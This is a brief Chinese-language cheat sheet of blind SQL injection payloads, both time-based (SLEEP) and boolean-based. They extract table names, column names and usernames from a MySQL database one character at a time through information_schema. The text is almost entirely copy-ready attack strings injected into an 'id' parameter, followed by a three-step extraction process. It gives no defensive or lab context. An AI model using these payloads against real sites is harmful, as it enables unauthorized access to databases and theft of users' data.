sql盲注获取数据库的表名、列名和具体数据

1.时间盲注

获取表名

sql
  id=1 AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),1,1))=97, SLEEP(5), 0)

获取列名

sql
  id=1 AND IF(ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),1,1))=117, SLEEP(5), 0)

获取数据

sql
  id=1 AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97, SLEEP(5), 0)

boolen盲注

获取表名

sql
  id=1 AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)='a'

获取列名

sql
  id=1 AND (SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name='users' LIMIT 1)='u'

获取数据

sql
  id=1 AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'

流程

获取表名，获取列名，获取数据

使用布尔盲注或时间盲注，逐个字符推断表名，列名，数据

sql
  id=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 OFFSET 0),1,1))=97

sql
  id=1 AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1 OFFSET 0),1,1))=117

sql
  id=1 AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1 OFFSET 0),1,1))=97